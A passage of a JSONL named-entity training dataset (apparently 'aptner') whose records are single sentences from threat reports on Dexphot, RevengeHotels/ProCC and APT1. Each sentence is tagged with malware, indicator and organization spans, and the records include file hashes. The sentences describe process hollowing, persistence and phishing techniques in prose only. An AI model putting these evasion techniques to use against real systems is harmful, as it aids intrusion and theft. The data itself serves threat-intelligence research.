executables .", "spans": {}, "info": {"id": "aptner_train_001837", "source": "aptner_train"}} {"text": "Unlike the files described earlier , these executables are never written to the filesystem .", "spans": {}, "info": {"id": "aptner_train_001838", "source": "aptner_train"}} {"text": "Instead , they exist only in memory , and Dexphot runs them by loading them into other system processes via process hollowing .", "spans": {"Malware: Dexphot": [[42, 49]], "System: process hollowing": [[108, 125]]}, "info": {"id": 
"aptner_train_001839", "source": "aptner_train"}} {"text": "Process hollowing is a technique that can hide malware within a legitimate system process .", "spans": {"System: Process hollowing": [[0, 17]]}, "info": {"id": "aptner_train_001840", "source": "aptner_train"}} {"text": "It replaces the contents of the legitimate process with malicious code .", "spans": {}, "info": {"id": "aptner_train_001841", "source": "aptner_train"}} {"text": "Detecting malicious code hidden using this method is not trivial , so process hollowing has become a prevalent technique used by malware today .", "spans": {"System: process hollowing": [[70, 87]]}, "info": {"id": "aptner_train_001842", "source": "aptner_train"}} {"text": "This method has the additional benefit of being fileless : the code can be run without actually being saved on the file system .", "spans": {}, "info": {"id": "aptner_train_001843", "source": "aptner_train"}} {"text": "Not only is it harder to detect the malicious code while it ’s running , it ’s harder to find useful forensics after the process has stopped .", "spans": {}, "info": {"id": "aptner_train_001844", "source": "aptner_train"}} {"text": "To initiate process hollowing , the loader DLL targets two legitimate system processes , for example svchost.exe or nslookup.exe , and spawns them in a suspended state .", "spans": {"System: process hollowing": [[12, 29]], "System: the loader DLL": [[32, 46]], "Indicator: svchost.exe": [[101, 112]], "Indicator: nslookup.exe": [[116, 128]]}, "info": {"id": "aptner_train_001845", "source": "aptner_train"}} {"text": "The loader DLL replaces the contents of these processes with the first and second decrypted executables .", "spans": {"System: The loader DLL": [[0, 14]]}, "info": {"id": "aptner_train_001846", "source": "aptner_train"}} {"text": "These executables are monitoring services for maintaining Dexphot ’s components .", "spans": {"Malware: Dexphot": [[58, 65]]}, "info": {"id": "aptner_train_001847", "source": 
"aptner_train"}} {"text": "The now-malicious processes are released from suspension and run .", "spans": {}, "info": {"id": "aptner_train_001848", "source": "aptner_train"}} {"text": "Next , the loader DLL targets the setup.exe file in SysWoW64 .", "spans": {"System: the loader DLL": [[7, 21]], "Indicator: setup.exe": [[34, 43]], "System: SysWoW64": [[52, 60]]}, "info": {"id": "aptner_train_001849", "source": "aptner_train"}} {"text": "It removes setup.exe ’s contents and replaces them with the third decrypted executable , a cryptocurrency miner .", "spans": {"Indicator: setup.exe": [[11, 20]]}, "info": {"id": "aptner_train_001850", "source": "aptner_train"}} {"text": "Although Dexphot always uses a cryptocurrency miner of some kind , it ’s not always the same miner .", "spans": {"Malware: Dexphot": [[9, 16]]}, "info": {"id": "aptner_train_001851", "source": "aptner_train"}} {"text": "It used different programs like XMRig and JCE Miner over the course of our research .", "spans": {"Malware: XMRig": [[32, 37]], "Malware: JCE Miner": [[42, 51]]}, "info": {"id": "aptner_train_001852", "source": "aptner_train"}} {"text": "The two monitoring services simultaneously check the status of all three malicious processes .", "spans": {}, "info": {"id": "aptner_train_001853", "source": "aptner_train"}} {"text": "Having dual monitoring services provides redundancy in case one of the monitoring processes is halted .", "spans": {}, "info": {"id": "aptner_train_001854", "source": "aptner_train"}} {"text": "If any of the processes are terminated , the monitors immediately identify the situation , terminate all remaining malicious processes , and re-infect the device .", "spans": {}, "info": {"id": "aptner_train_001855", "source": "aptner_train"}} {"text": "The monitoring components also detect freshly launched cmd.exe processes and terminate them promptly .", "spans": {"Indicator: cmd.exe": [[55, 62]]}, "info": {"id": "aptner_train_001856", "source": "aptner_train"}} {"text": "As a 
final fail-safe , Dexphot uses schtasks.exe to create scheduled tasks .", "spans": {"Indicator: schtasks.exe": [[36, 48]]}, "info": {"id": "aptner_train_001857", "source": "aptner_train"}} {"text": "This persistence technique is interesting , because it employs two distinct MITRE ATT&CK techniques : Scheduled Task and Signed Binary Proxy Execution .", "spans": {"System: MITRE ATT&CK": [[76, 88]], "System: Scheduled Task": [[102, 116]], "System: Signed Binary Proxy Execution": [[121, 150]]}, "info": {"id": "aptner_train_001858", "source": "aptner_train"}} {"text": "The scheduled tasks call msiexec.exe as a proxy to run the malicious code , much like how msiexec.exe was used during installation .", "spans": {"Indicator: msiexec.exe": [[25, 36], [90, 101]]}, "info": {"id": "aptner_train_001859", "source": "aptner_train"}} {"text": "Using msiexec.exe , a legitimate system process , can make it harder to trace the source of malicious activity .", "spans": {"Indicator: msiexec.exe": [[6, 17]]}, "info": {"id": "aptner_train_001860", "source": "aptner_train"}} {"text": "Furthermore , the tasks allow Dexphot to conveniently update the payload from the web every time the tasks run .", "spans": {"Malware: Dexphot": [[30, 37]]}, "info": {"id": "aptner_train_001861", "source": "aptner_train"}} {"text": "They automatically update all of Dexphot ’s components , both upon system reboot as well as every 90 or 110 minutes while the system is running .", "spans": {"Malware: Dexphot": [[33, 40]]}, "info": {"id": "aptner_train_001862", "source": "aptner_train"}} {"text": "Dexphot also generates the names for the tasks at runtime , which means a simple block list of hardcoded task names will not be effective in preventing them from running .", "spans": {"Malware: Dexphot": [[0, 7]]}, "info": {"id": "aptner_train_001863", "source": "aptner_train"}} {"text": "The names are usually in a GUID format , although after we released our first round of Dexphot-blocking protections , the threat 
authors began to use random strings .", "spans": {}, "info": {"id": "aptner_train_001864", "source": "aptner_train"}} {"text": "The threat authors have one more evasion technique for these scheduled tasks : some Dexphot variants copy msiexec.exe to an arbitrary location and give it a random name , such as %AppData%\\.exe .", "spans": {"Malware: Dexphot": [[84, 91]], "Indicator: msiexec.exe": [[106, 117]], "Indicator: %AppData%\\.exe": [[179, 201]]}, "info": {"id": "aptner_train_001865", "source": "aptner_train"}} {"text": "This makes the system process running malicious code a literal moving target .", "spans": {}, "info": {"id": "aptner_train_001866", "source": "aptner_train"}} {"text": "Dexphot exhibits multiple layers of polymorphism across the binaries it distributes .", "spans": {"Malware: Dexphot": [[0, 7]]}, "info": {"id": "aptner_train_001867", "source": "aptner_train"}} {"text": "For example , the MSI package used in the campaign contains different files , as shown in the table below .", "spans": {"System: MSI": [[18, 21]]}, "info": {"id": "aptner_train_001868", "source": "aptner_train"}} {"text": "The MSI packages generally include a clean version of unzIP .", "spans": {"System: MSI": [[4, 7]], "System: unzIP": [[54, 59]]}, "info": {"id": "aptner_train_001869", "source": "aptner_train"}} {"text": "exe , a password-protected ZIP file , and a batch file that checks for currently installed antivirus products .", "spans": {"Indicator: exe": [[0, 3]]}, "info": {"id": "aptner_train_001870", "source": "aptner_train"}} {"text": "However , the batch file is not always present , and the names of the ZIP files and Loader DLLs , as well as the password for extracting the ZIP file , all change from one package to the next .", "spans": {"System: Loader DLLs": [[84, 95]]}, "info": {"id": "aptner_train_001871", "source": "aptner_train"}} {"text": "In addition , the contents of each Loader DLL differs from package to package , as does the encrypted data included in the 
ZIP file .", "spans": {"System: Loader DLL": [[35, 45]]}, "info": {"id": "aptner_train_001872", "source": "aptner_train"}} {"text": "This leads to the generation of a different ZIP archive and , in turn , a unique MSI package , each time the attacker bundles the files together .", "spans": {"System: ZIP archive": [[44, 55]], "System: MSI": [[81, 84]]}, "info": {"id": "aptner_train_001873", "source": "aptner_train"}} {"text": "Because of these carefully designed layers of polymorphism , a traditional file-based detection approach wouldn’t be effective against Dexphot .", "spans": {"Malware: Dexphot": [[135, 142]]}, "info": {"id": "aptner_train_001874", "source": "aptner_train"}} {"text": "Besides tracking the files and processes that Dexphot uses to execute an attack , we have also been monitoring the domains used to host malicious payloads .", "spans": {"Malware: Dexphot": [[46, 53]]}, "info": {"id": "aptner_train_001875", "source": "aptner_train"}} {"text": "The URLs used for hosting all follow a similar pattern .", "spans": {}, "info": {"id": "aptner_train_001876", "source": "aptner_train"}} {"text": "The domain address usually ends in a .info or .net TLD , while the file name for the actual payload consists of random characters , similar to the randomness previously seen being used to generate file names and scheduled tasks .", "spans": {"Indicator: .info": [[37, 42]], "Indicator: .net": [[46, 50]]}, "info": {"id": "aptner_train_001877", "source": "aptner_train"}} {"text": "Many of the URLs listed were in use for an extended period .", "spans": {}, "info": {"id": "aptner_train_001878", "source": "aptner_train"}} {"text": "However , the MSI packages hosted at each URL are frequently changed or updated .", "spans": {"System: MSI": [[14, 17]]}, "info": {"id": "aptner_train_001879", "source": "aptner_train"}} {"text": "In addition , every few days more domains are generated to host more payloads .", "spans": {}, "info": {"id": "aptner_train_001880", "source": 
"aptner_train"}} {"text": "After a few months of monitoring , we were able to identify around 200 unique Dexphot domains .", "spans": {"Malware: Dexphot": [[78, 85]]}, "info": {"id": "aptner_train_001881", "source": "aptner_train"}} {"text": "Dexphot is not the type of attack that generates mainstream media attention ; it ’s one of the countless malware campaigns that are active at any given time .", "spans": {"Malware: Dexphot": [[0, 7]]}, "info": {"id": "aptner_train_001882", "source": "aptner_train"}} {"text": "Its goal is a very common one in cybercriminal circles — to install a coin miner that silently steals computer resources and generates revenue for the attackers — yet Dexphot exemplifies the level of complexity and rate of evolution of even everyday threats , intent on evading protections and motivated to fly under the radar for the prospect of profit .", "spans": {"Malware: Dexphot": [[167, 174]]}, "info": {"id": "aptner_train_001883", "source": "aptner_train"}} {"text": "To combat threats , several next-generation protection engines in Microsoft Defender Advanced Threat Protection ’s antivirus component detect and stop malicious techniques at multiple points along the attack chain .", "spans": {"System: Microsoft Defender Advanced Threat Protection": [[66, 111]], "System: antivirus component": [[115, 134]]}, "info": {"id": "aptner_train_001884", "source": "aptner_train"}} {"text": "For Dexphot , machine learning-based detections in the cloud recognize and block the DLLs loaded by rundll32.exe , stopping the attack chain in its early stages .", "spans": {"Malware: Dexphot": [[4, 11]], "System: DLLs": [[85, 89]], "Indicator: rundll32.exe": [[100, 112]]}, "info": {"id": "aptner_train_001885", "source": "aptner_train"}} {"text": "Memory scans detect and terminate the loading of malicious code hidden by process hollowing — including the monitoring processes that attempt to update the malware code and re-infect the machine via PowerShell commands .", "spans": 
{"System: process hollowing": [[74, 91]], "System: PowerShell": [[199, 209]]}, "info": {"id": "aptner_train_001886", "source": "aptner_train"}} {"text": "Behavioral blocking and containment capabilities are especially effective in defeating Dexphot ’s fileless techniques , detection evasion , and persistence mechanisms , including the periodic and boot-time attempts to update the malware via scheduled tasks .", "spans": {"Malware: Dexphot": [[87, 94]]}, "info": {"id": "aptner_train_001887", "source": "aptner_train"}} {"text": "As mentioned , given the complexity of the attack chain and of Dexphot ’s persistence methods , we released a remediation solution that prevents re-infection by removing artifacts .", "spans": {"Malware: Dexphot": [[63, 70]]}, "info": {"id": "aptner_train_001888", "source": "aptner_train"}} {"text": "The detection , blocking , and remediation of Dexphot on endpoints are exposed in Microsoft Defender Security Center , where Microsoft Defender ATP ’s rich capabilities like endpoint detection and response , automated investigation and remediation , and others enable security operations teams to investigate and remediate attacks in enterprise environments .", "spans": {"Malware: Dexphot": [[46, 53]], "System: Microsoft Defender Security Center": [[82, 116]], "System: Microsoft Defender ATP": [[125, 147]]}, "info": {"id": "aptner_train_001889", "source": "aptner_train"}} {"text": "With these capabilities , Microsoft Defender ATP provides comprehensive protection against Dexphot and the countless other complex and evolving threats that we face every day .", "spans": {"System: Microsoft Defender ATP": [[26, 48]], "Malware: Dexphot": [[91, 98]]}, "info": {"id": "aptner_train_001890", "source": "aptner_train"}} {"text": "Dexphot : 72acaf9ff8a43c68416884a3fff3b23e749b4bb8fb39e16f9976643360ed391f .", "spans": {"Malware: Dexphot": [[0, 7]], "Indicator: 72acaf9ff8a43c68416884a3fff3b23e749b4bb8fb39e16f9976643360ed391f": [[10, 74]]}, "info": {"id": 
"aptner_train_001891", "source": "aptner_train"}} {"text": "Dexphot : 22beffb61cbdc2e0c3eefaf068b498b63a193b239500dab25d03790c467379e3 .", "spans": {"Malware: Dexphot": [[0, 7]], "Indicator: 22beffb61cbdc2e0c3eefaf068b498b63a193b239500dab25d03790c467379e3": [[10, 74]]}, "info": {"id": "aptner_train_001892", "source": "aptner_train"}} {"text": "Dexphot : 65eac7f9b67ff69cefed288f563b4d77917c94c410c6c6c4e4390db66305ca2a .", "spans": {"Malware: Dexphot": [[0, 7]], "Indicator: 65eac7f9b67ff69cefed288f563b4d77917c94c410c6c6c4e4390db66305ca2a": [[10, 74]]}, "info": {"id": "aptner_train_001893", "source": "aptner_train"}} {"text": "Dexphot : ba9467e0d63ba65bf10650a3c8d36cd292b3f846983032a44a835e5966bc7e88 .", "spans": {"Malware: Dexphot": [[0, 7]], "Indicator: ba9467e0d63ba65bf10650a3c8d36cd292b3f846983032a44a835e5966bc7e88": [[10, 74]]}, "info": {"id": "aptner_train_001894", "source": "aptner_train"}} {"text": "Dexphot : 537d7fe3b426827e40bbdd1d127ddb59effe1e9b3c160804df8922f92e0b366e .", "spans": {"Malware: Dexphot": [[0, 7]], "Indicator: 537d7fe3b426827e40bbdd1d127ddb59effe1e9b3c160804df8922f92e0b366e": [[10, 74]]}, "info": {"id": "aptner_train_001895", "source": "aptner_train"}} {"text": "Dexphot : 504cc403e0b83233f8d20c0c86b0611facc040b868964b4afbda3214a2c8e1c5 .", "spans": {"Malware: Dexphot": [[0, 7]], "Indicator: 504cc403e0b83233f8d20c0c86b0611facc040b868964b4afbda3214a2c8e1c5": [[10, 74]]}, "info": {"id": "aptner_train_001896", "source": "aptner_train"}} {"text": "Dexphot : aa5c56fe01af091f07c56ac7cbd240948ea6482b6146e0d3848d450977dff152 .", "spans": {"Malware: Dexphot": [[0, 7]], "Indicator: aa5c56fe01af091f07c56ac7cbd240948ea6482b6146e0d3848d450977dff152": [[10, 74]]}, "info": {"id": "aptner_train_001897", "source": "aptner_train"}} {"text": "RevengeHotels : cybercrime targeting hotel front desks worldwide .", "spans": {"Organization: RevengeHotels": [[0, 13]]}, "info": {"id": "aptner_train_001898", "source": "aptner_train"}} {"text": "RevengeHotels is a 
targeted cybercrime malware campaign against hotels , hostels , hospitality and tourism companies , mainly , but not exclusively , located in Brazil .", "spans": {"Organization: RevengeHotels": [[0, 13]]}, "info": {"id": "aptner_train_001899", "source": "aptner_train"}} {"text": "We have confirmed more than 20 hotels that are victims of the group , located in eight states in Brazil , but also in other countries such as Argentina , Bolivia , Chile , Costa Rica , France , Italy , Mexico , Portugal , Spain , Thailand and Turkey .", "spans": {}, "info": {"id": "aptner_train_001900", "source": "aptner_train"}} {"text": "The goal of the campaign is to capture credit card data from guests and travelers stored in hotel systems , as well as credit card data received from popular online travel agencies ( OTAs ) such as Booking.com .", "spans": {"Organization: online travel agencies": [[158, 180]], "Organization: OTAs": [[183, 187]], "Indicator: Booking.com": [[198, 209]]}, "info": {"id": "aptner_train_001901", "source": "aptner_train"}} {"text": "The main attack vector is via email with crafted Word , Excel or PDF documents attached .", "spans": {}, "info": {"id": "aptner_train_001902", "source": "aptner_train"}} {"text": "Some of them exploit CVE-2017-0199 , loading it using VBS and PowerShell scripts and then installing customized versions of RevengeRAT , NjRAT , NanoCoreRAT , 888 RAT and other custom malware such as ProCC in the victim ’s machine .", "spans": {"Vulnerability: CVE-2017-0199": [[21, 34]], "System: PowerShell": [[62, 72]], "Malware: RevengeRAT": [[124, 134]], "Malware: NjRAT": [[137, 142]], "Malware: NanoCoreRAT": [[145, 156]], "Malware: 888 RAT": [[159, 166]], "Malware: ProCC": [[200, 205]]}, "info": {"id": "aptner_train_001903", "source": "aptner_train"}} {"text": "The group has been active since 2015 , but increased its attacks in 2019 .", "spans": {}, "info": {"id": "aptner_train_001904", "source": "aptner_train"}} {"text": "In our research , we were 
also able to track two groups targeting the hospitality sector , using separate but similar infrastructure , tools and techniques .", "spans": {}, "info": {"id": "aptner_train_001905", "source": "aptner_train"}} {"text": "PaloAlto has already written about one of them .", "spans": {"Organization: PaloAlto": [[0, 8]]}, "info": {"id": "aptner_train_001906", "source": "aptner_train"}} {"text": "We named the first group RevengeHotels , and the second ProCC .", "spans": {"Organization: RevengeHotels": [[25, 38]], "Organization: ProCC": [[56, 61]]}, "info": {"id": "aptner_train_001907", "source": "aptner_train"}} {"text": "These groups use a lot of social engineering in their attacks , asking for a quote from what appears to be a government entity or private company wanting to make a reservation for a large number of people .", "spans": {}, "info": {"id": "aptner_train_001908", "source": "aptner_train"}} {"text": "Their infrastructure also relies on the use of dynamic DNS services pointing to commercial hosting and self-hosted servers .", "spans": {}, "info": {"id": "aptner_train_001909", "source": "aptner_train"}} {"text": "They also sell credentials from the affected systems , allowing other cybercriminals to have remote access to hotel front desks infected by the campaign .", "spans": {}, "info": {"id": "aptner_train_001910", "source": "aptner_train"}} {"text": "We monitored the activities of these groups and the new malware they are creating for over a year .", "spans": {}, "info": {"id": "aptner_train_001911", "source": "aptner_train"}} {"text": "With a high degree of confidence , we can confirm that at least two distinct groups are focused on attacking this sector ; there is also a third group , though it is unclear if its focus is solely on this sector or if carries out other types of attacks .", "spans": {}, "info": {"id": "aptner_train_001912", "source": "aptner_train"}} {"text": "One of the tactics used in operations by these groups is highly targeted 
spear-phishing messages .", "spans": {}, "info": {"id": "aptner_train_001913", "source": "aptner_train"}} {"text": "They register typo-squatting domains , impersonating legitimate companies .", "spans": {}, "info": {"id": "aptner_train_001914", "source": "aptner_train"}} {"text": "The emails are well written , with an abundance of detail .", "spans": {"System: emails": [[4, 10]]}, "info": {"id": "aptner_train_001915", "source": "aptner_train"}} {"text": "They explain why the company has chosen to book that particular hotel .", "spans": {}, "info": {"id": "aptner_train_001916", "source": "aptner_train"}} {"text": "By checking the sender information , it ’s possible to determine whether the company actually exists .", "spans": {}, "info": {"id": "aptner_train_001917", "source": "aptner_train"}} {"text": "However , there is a small difference between the domain used to send the email and the real one .", "spans": {"System: email": [[74, 79]]}, "info": {"id": "aptner_train_001918", "source": "aptner_train"}} {"text": "This spear-phishing message , written in Portuguese , has a malicious file attached misusing the name of a real attorney office , while the domain sender of the message was registered one day before , using a typo-squatting domain .", "spans": {}, "info": {"id": "aptner_train_001919", "source": "aptner_train"}} {"text": "The group goes further in its social engineering effort : to convince the hotel personnel about the legitimacy of their request , a copy of the National Registry of Legal Entities card ( CNPJ ) is attached to the quotation .", "spans": {}, "info": {"id": "aptner_train_001920", "source": "aptner_train"}} {"text": "The attached file , Reserva Advogados Associados.docx ( Attorneys Associates Reservation.docx ) , is a malicious Word file that drops a remote OLE object via template injection to execute macro code .", "spans": {"Indicator: Reserva Advogados Associados.docx": [[20, 53]], "Indicator: Attorneys Associates Reservation.docx": [[56, 
93]], "System: OLE": [[143, 146]]}, "info": {"id": "aptner_train_001921", "source": "aptner_train"}} {"text": "The macro code inside the remote OLE document contains PowerShell commands that download and execute the final payload .", "spans": {"System: OLE": [[33, 36]], "System: PowerShell": [[55, 65]]}, "info": {"id": "aptner_train_001922", "source": "aptner_train"}} {"text": "In the RevengeHotels campaign , the downloaded files are .NET binaries protected with the Yoda Obfuscator .", "spans": {"Organization: RevengeHotels": [[7, 20]], "Indicator: .NET": [[57, 61]], "Malware: Yoda Obfuscator": [[90, 105]]}, "info": {"id": "aptner_train_001923", "source": "aptner_train"}} {"text": "After unpacking them , the code is recognizable as the commercial RAT RevengeRAT .", "spans": {"Malware: RAT": [[66, 69]], "Malware: RevengeRAT": [[70, 80]]}, "info": {"id": "aptner_train_001924", "source": "aptner_train"}} {"text": "An additional module written by the group called ScreenBooking is used to capture credit card data .", "spans": {"Malware: ScreenBooking": [[49, 62]]}, "info": {"id": "aptner_train_001925", "source": "aptner_train"}} {"text": "It monitors whether the user is browsing the web page .", "spans": {}, "info": {"id": "aptner_train_001926", "source": "aptner_train"}} {"text": "In the initial versions , back in 2016 , the downloaded files from RevengeHotels campaigns were divided into two modules : a backdoor and a module to capture screenshots .", "spans": {"Organization: RevengeHotels": [[67, 80]], "Malware: backdoor": [[125, 133]]}, "info": {"id": "aptner_train_001927", "source": "aptner_train"}} {"text": "Recently we noticed that these modules had been merged into a single backdoor module able to collect data from clipboard and capture screenshots .", "spans": {}, "info": {"id": "aptner_train_001928", "source": "aptner_train"}} {"text": "In this example , the webpage that the attacker is monitoring is booking.com ( more specifically , the page containing the 
card details ) .", "spans": {"Indicator: booking.com": [[65, 76]]}, "info": {"id": "aptner_train_001929", "source": "aptner_train"}} {"text": "The code is specifically looking for data in Portuguese and English , allowing the attackers to steal credit card data from web pages written in these languages .", "spans": {}, "info": {"id": "aptner_train_001930", "source": "aptner_train"}} {"text": "In the ProCC campaigns , the downloaded files are Delphi binaries .", "spans": {"Organization: ProCC": [[7, 12]], "System: Delphi": [[50, 56]]}, "info": {"id": "aptner_train_001931", "source": "aptner_train"}} {"text": "The backdoor installed in the machine is more customized than that used by RevengeHotels : it ’s developed from scratch and is able to collect data from the clipboard and printer spooler , and capture screenshots .", "spans": {"Malware: backdoor": [[4, 12]], "Organization: RevengeHotels": [[75, 88]]}, "info": {"id": "aptner_train_001932", "source": "aptner_train"}} {"text": "Because the personnel in charge of confirming reservations usually need to pull credit card data from OTA websites , it ’s possible to collect card numbers by monitoring the clipboard and the documents sent to the printer .", "spans": {"System: OTA websites": [[102, 114]]}, "info": {"id": "aptner_train_001933", "source": "aptner_train"}} {"text": "According to the relevant underground forums and messaging groups , these criminals also infect front desk machines in order to capture credentials from the hotel administration software ; they can then steal credit card details from it too .", "spans": {}, "info": {"id": "aptner_train_001934", "source": "aptner_train"}} {"text": "Some criminals also sell remote access to these systems , acting as a concierge for other cybercriminals by giving them permanent access to steal new data by themselves .", "spans": {}, "info": {"id": "aptner_train_001935", "source": "aptner_train"}} {"text": "Some Brazilian criminals tout credit card data extracted from 
a hotel ’s system as high quality and reliable because it was extracted from a trusted source , i.e. , a hotel administration system .", "spans": {"Organization: Brazilian criminals": [[5, 24]]}, "info": {"id": "aptner_train_001936", "source": "aptner_train"}} {"text": "The majority of the victims are associated with the hospitality sector .", "spans": {}, "info": {"id": "aptner_train_001937", "source": "aptner_train"}} {"text": "Based on the routines used , we estimate that this attack has a global reach .", "spans": {}, "info": {"id": "aptner_train_001938", "source": "aptner_train"}} {"text": "Based on data extracted from Bit.ly statistics , we can see that potential victims from many other countries have at least accessed the malicious link .", "spans": {"Indicator: Bit.ly": [[29, 35]]}, "info": {"id": "aptner_train_001939", "source": "aptner_train"}} {"text": "This data suggests that the number of countries with potential victims is higher than our telemetry has registered .", "spans": {}, "info": {"id": "aptner_train_001940", "source": "aptner_train"}} {"text": "RevengeHotels is a campaign that has been active since at least 2015 , revealing different groups using traditional RAT malware to infect businesses in the hospitality sector .", "spans": {"Organization: RevengeHotels": [[0, 13]], "Malware: RAT": [[116, 119]]}, "info": {"id": "aptner_train_001941", "source": "aptner_train"}} {"text": "While there is a marked interest in Brazilian victims , our telemetry shows that their reach has extended to other countries in Latin America and beyond .", "spans": {}, "info": {"id": "aptner_train_001942", "source": "aptner_train"}} {"text": "The use of spear-phishing emails , malicious documents and RAT malware is yielding significant results for at least two groups we have identified in this campaign .", "spans": {"Malware: RAT": [[59, 62]]}, "info": {"id": "aptner_train_001943", "source": "aptner_train"}} {"text": "Other threat actors may also be part of this wave of 
attacks , though there is no confirmation at the current time .", "spans": {}, "info": {"id": "aptner_train_001944", "source": "aptner_train"}} {"text": "If you want to be a savvy and safe traveler , it ’s highly recommended to use a virtual payment card for reservations made via OTAs , as these cards normally expire after one charge .", "spans": {"System: OTAs": [[127, 131]]}, "info": {"id": "aptner_train_001945", "source": "aptner_train"}} {"text": "While paying for your reservation or checking out at a hotel , it ’s a good idea to use a virtual wallet such as Apple Pay , Google Pay , etc .", "spans": {"System: Apple Pay": [[113, 122]], "System: Google Pay": [[125, 135]]}, "info": {"id": "aptner_train_001946", "source": "aptner_train"}} {"text": "RevengeHotels : 74440d5d0e6ae9b9a03d06dd61718f66 .", "spans": {"Organization: RevengeHotels": [[0, 13]], "Indicator: 74440d5d0e6ae9b9a03d06dd61718f66": [[16, 48]]}, "info": {"id": "aptner_train_001947", "source": "aptner_train"}} {"text": "RevengeHotels : e675bdf6557350a02f15c14f386fcc47 .", "spans": {"Organization: RevengeHotels": [[0, 13]], "Indicator: e675bdf6557350a02f15c14f386fcc47": [[16, 48]]}, "info": {"id": "aptner_train_001948", "source": "aptner_train"}} {"text": "RevengeHotels : df632e25c32e8f8ad75ed3c50dd1cd47 .", "spans": {"Organization: RevengeHotels": [[0, 13]], "Indicator: df632e25c32e8f8ad75ed3c50dd1cd47": [[16, 48]]}, "info": {"id": "aptner_train_001949", "source": "aptner_train"}} {"text": "RevengeHotels : a089efd7dd9180f9b726594bb6cf81ae .", "spans": {"Organization: RevengeHotels": [[0, 13]], "Indicator: a089efd7dd9180f9b726594bb6cf81ae": [[16, 48]]}, "info": {"id": "aptner_train_001950", "source": "aptner_train"}} {"text": "RevengeHotels : 81701c891a1766c51c74bcfaf285854b .", "spans": {"Organization: RevengeHotels": [[0, 13]], "Indicator: 81701c891a1766c51c74bcfaf285854b": [[16, 48]]}, "info": {"id": "aptner_train_001951", "source": "aptner_train"}} {"text": "APT1 .", "spans": {"Organization: APT1": 
[[0, 4]]}, "info": {"id": "aptner_train_001952", "source": "aptner_train"}} {"text": "Since 2004 , Mandiant has investigated computer security breaches at hundreds of organizations around the world.The majority of these security breaches are attributed to advanced threat actors referred to as the “ Advanced Persistent Threat ” ( APT ) .", "spans": {"Organization: Mandiant": [[13, 21]]}, "info": {"id": "aptner_train_001953", "source": "aptner_train"}} {"text": "We first published details about the APT in our January 2010 M-Trends report .", "spans": {"Organization: M-Trends": [[61, 69]]}, "info": {"id": "aptner_train_001954", "source": "aptner_train"}} {"text": "As we stated in there port , our position was that “ The Chinese government may authorize this activity , but there ’s no way to determine the extent of its involvement. ” Now , three years later , we have the evidence required to change our assessment .", "spans": {}, "info": {"id": "aptner_train_001955", "source": "aptner_train"}} {"text": "The details we have analyzed during hundreds of investigations convince us that the groups conducting these activities are based primarily in China and that the Chinese Government is aware of them .", "spans": {}, "info": {"id": "aptner_train_001956", "source": "aptner_train"}} {"text": "Mandiant continues to track dozens of APT groups around the world ; however , this report is focused on the most prolific of these groups .", "spans": {"Organization: Mandiant": [[0, 8]]}, "info": {"id": "aptner_train_001957", "source": "aptner_train"}} {"text": "We refer to this group as “ APT1 ” and it is one of more than 20 APT groups with origins inChina .", "spans": {"Organization: APT1": [[28, 32]]}, "info": {"id": "aptner_train_001958", "source": "aptner_train"}} {"text": "APT1 is a single organization of operators that has conducted a cyber espionage campaign against a broad range of victims since at least 2006 .", "spans": {"Organization: APT1": [[0, 4]]}, "info": {"id": 
"aptner_train_001959", "source": "aptner_train"}} {"text": "From our observations , it is one of the most prolific cyber espionage groups in terms of the sheer quantity of information stolen .", "spans": {}, "info": {"id": "aptner_train_001960", "source": "aptner_train"}} {"text": "The scale and impact of APT1 ’s operations compelled us to write this report .", "spans": {"Organization: APT1": [[24, 28]]}, "info": {"id": "aptner_train_001961", "source": "aptner_train"}} {"text": "The activity we have directly observed likely represents only a small fraction of the cyber espionage that APT1 has conducted .", "spans": {"Organization: APT1": [[107, 111]]}, "info": {"id": "aptner_train_001962", "source": "aptner_train"}} {"text": "Though our visibility of APT1 ’s activities is incomplete , we have analyzed the group ’s intrusions against nearly 150 victims over seven years .", "spans": {"Organization: APT1": [[25, 29]]}, "info": {"id": "aptner_train_001963", "source": "aptner_train"}} {"text": "From our unique vantage point responding to victims , we tracked APT1 back to four large networks in Shanghai , two of which are allocated directly to the Pudong New Area .", "spans": {"Organization: APT1": [[65, 69]]}, "info": {"id": "aptner_train_001964", "source": "aptner_train"}} {"text": "We uncovered a substantial amount of APT1 ’s attack infrastructure , command and control , and modus operandi ( tools , tactics , and procedures ) .", "spans": {"Organization: APT1": [[37, 41]]}, "info": {"id": "aptner_train_001965", "source": "aptner_train"}} {"text": "In an effort to underscore there are actual individuals behind the keyboard , Mandiant is revealing three personas we have attributed to APT1 .", "spans": {"Organization: Mandiant": [[78, 86]], "Organization: APT1": [[137, 141]]}, "info": {"id": "aptner_train_001966", "source": "aptner_train"}} {"text": "These operators , like soldiers , may merely be following orders given to them by others .", "spans": {}, "info": {"id": 
"aptner_train_001967", "source": "aptner_train"}} {"text": "We believe that APT1 is able to wage such a long-running and extensive cyber espionage campaign in large part because it receives direct government support .", "spans": {"Organization: APT1": [[16, 20]]}, "info": {"id": "aptner_train_001969", "source": "aptner_train"}} {"text": "In seeking to identify the organization behind this activity ,our research found that People ’s Liberation Army ( PLA ’s ) Unit 61398 is similar to APT1 in its mission , capabilities , and resources .", "spans": {"Organization: People ’s Liberation Army": [[86, 111]], "Organization: PLA": [[114, 117]], "Organization: Unit 61398": [[123, 133]], "Organization: APT1": [[148, 152]]}, "info": {"id": "aptner_train_001970", "source": "aptner_train"}} {"text": "PLA Unit 61398 is also located in precisely the same area from which APT1 activity appears to originate .", "spans": {"Organization: PLA": [[0, 3]], "Organization: Unit 61398": [[4, 14]], "Organization: APT1": [[69, 73]]}, "info": {"id": "aptner_train_001971", "source": "aptner_train"}} {"text": "APT1 is believed to be the 2nd Bureau of the People ’s Liberation Army ( PLA ) General Staff Department ’s ( GSD ) 3rd Department , which is most commonly known by its Military Unit Cover Designator ( MUCD ) as Unit 61398 .", "spans": {"Organization: APT1": [[0, 4]], "Organization: Bureau of the People ’s Liberation Army": [[31, 70]], "Organization: PLA": [[73, 76]], "Organization: General Staff Department": [[79, 103]], "Organization: GSD": [[109, 112]], "Organization: Military Unit Cover Designator": [[168, 198]], "Organization: MUCD": [[201, 205]], "Organization: Unit 61398": [[211, 221]]}, "info": {"id": "aptner_train_001972", "source": "aptner_train"}} {"text": "The nature of “ Unit 61398 ’s ” work is considered by China to be a state secret ; however , we believe it engages in harmful “ Computer Network Operations. 
